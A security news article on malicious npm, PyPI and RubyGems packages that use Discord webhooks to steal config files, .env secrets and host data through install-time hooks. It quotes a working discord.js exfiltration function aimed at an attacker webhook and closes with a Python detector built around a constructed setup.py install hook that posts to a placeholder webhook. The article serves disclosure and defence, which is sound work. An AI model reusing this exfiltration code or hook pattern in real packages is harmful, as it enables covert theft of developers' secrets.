Threat Actors Weaponize Discord Webhooks for Command and Control with npm, PyPI, and Ruby Packages

Cybercriminals have discovered a novel way to co-opt Discord webhooks as surrogate command-and-control (C2) channels across popular language ecosystems.

Unlike traditional C2 servers, webhooks offer free, low-profile exfiltration that blends seamlessly into legitimate HTTPS traffic.

Over the past month, malicious packages in npm, PyPI, and RubyGems have quietly siphoned sensitive files and telemetry from developer machines and continuous integration environments.

Initial sightings involved a seemingly innocuous npm module named mysql-dumpdiscord. Upon installation or execution, it probes for configuration and environment files—such as config[.]json, [.]env, and ayarlar[.]js—reads their contents, and then issues an HTTP POST to a hard-coded Discord webhook URL.

The attacker-controlled webhook, embedded as a string constant, receives each file’s contents, with longer files truncated to 1,900 characters to fit Discord’s messaging limits.

Socket.dev analysts identified this technique only after network monitoring flagged an unusual spike in POST requests to discord[.]com/api/webhooks/....

Further investigation revealed a second npm proof-of-concept leveraging the official discord.js library:

const { WebhookClient } = require('discord.js');

// Exports one async function: every string passed in is joined and posted
// to the hard-coded, attacker-controlled webhook as a single message.
module.exports = async function send(messages) {
  try {
    const client = new WebhookClient({ url: 'https://discord.com/api/webhooks/1323713674971713676/…' });
    await client.send(messages.join(' '));
  } catch (e) {
    // Silent failure: network and API errors are swallowed so nothing surfaces on the host
  }
};

This minimalist approach transforms any string passed into the function into a C2 message, bypassing host-based detection that looks for unusual domains or signatures.

Across ecosystems, threat actors adopt similar tactics. In Python’s PyPI registry, a package dubbed malinssx overrides the install command in setuptools.

During pip install, it serializes a notification message in Vietnamese—“Some just installed the maladicus package via pip!”—and dispatches it to its Discord webhook.

Any network errors are caught and ignored, and the legitimate install process continues unobstructed.

In RubyGems, an altered version of sqlcommenterrails collects host metadata—such as /etc/passwd contents, DNS servers, current user, and public IP—and formats it into a multi-line JSON payload.

This is then POSTed to a webhook over HTTPS. Error handling is silent, ensuring no interruption in the gem installation.

Infection Mechanism

These packages exploit install-time hooks to achieve persistence and stealth. By overriding installer commands (install[.]run in Python, gemspec hooks in Ruby), malicious code executes before the host’s security controls alert on runtime behaviors.

This early-stage execution means secrets are exfiltrated long before code analysis or endpoint protection kicks in.

Moreover, using Discord’s infrastructure avoids raising suspicions from static allow-lists that permit traffic to discord[.]com for business collaboration, turning a trusted domain into a covert data pipeline.
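As an added example (not code from the article or from the packages it describes), the following Python check scans a package's source for the two indicators discussed above: a hard-coded Discord webhook URL and a setuptools install-command override. The sample package contents and the webhook URL placeholder are constructed; the URL pattern assumes Discord's documented webhook path shape.

```python
import re
from typing import Dict, List, Tuple

# Discord webhook endpoints share one URL shape; the numeric id and token are
# per-attacker, so match the structure instead of any single known value.
WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+",
    re.IGNORECASE,
)
# A setup.py that imports the setuptools 'install' command or registers a
# replacement via cmdclass is the install-time hook pattern described above.
INSTALL_HOOK_RE = re.compile(
    r"setuptools\.command\.install\s+import\s+install|cmdclass\s*=\s*\{[^}]*['\"]install['\"]"
)

def scan_file(path: str, text: str) -> List[Tuple[str, str, str]]:
    """Return (path, indicator, evidence) tuples for one source file."""
    findings = []
    for m in WEBHOOK_RE.finditer(text):
        findings.append((path, "discord_webhook_url", m.group(0)))
    if path.endswith("setup.py") and INSTALL_HOOK_RE.search(text):
        findings.append((path, "setuptools_install_override", "cmdclass/install"))
    return findings

def scan_package(files: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Scan an in-memory {path: source} map (read an unpacked sdist into it)."""
    out: List[Tuple[str, str, str]] = []
    for path, text in files.items():
        out.extend(scan_file(path, text))
    return out

# Constructed sample package (not real malware): a setup.py install hook that
# posts to a placeholder webhook, plus a benign module for contrast.
SAMPLE_PACKAGE = {
    "setup.py": (
        "from setuptools import setup\n"
        "from setuptools.command.install import install\n"
        "class Hook(install):\n"
        "    def run(self):\n"
        "        requests.post('https://discord.com/api/webhooks/"
        "000000000000000000/EXAMPLE-TOKEN', json={'content': 'installed'})\n"
        "        install.run(self)\n"
        "setup(name='demo', cmdclass={'install': Hook})\n"
    ),
    "demo/util.py": "def add(a, b):\n    return a + b\n",
}

if __name__ == "__main__":
    for path, indicator, evidence in scan_package(SAMPLE_PACKAGE):
        print(f"{path}: {indicator} ({evidence})")
```

Running it on the constructed sample flags setup.py twice (webhook URL, install override) and the benign module not at all; the same checks apply to npm and RubyGems sources by feeding their files into scan_package.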


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.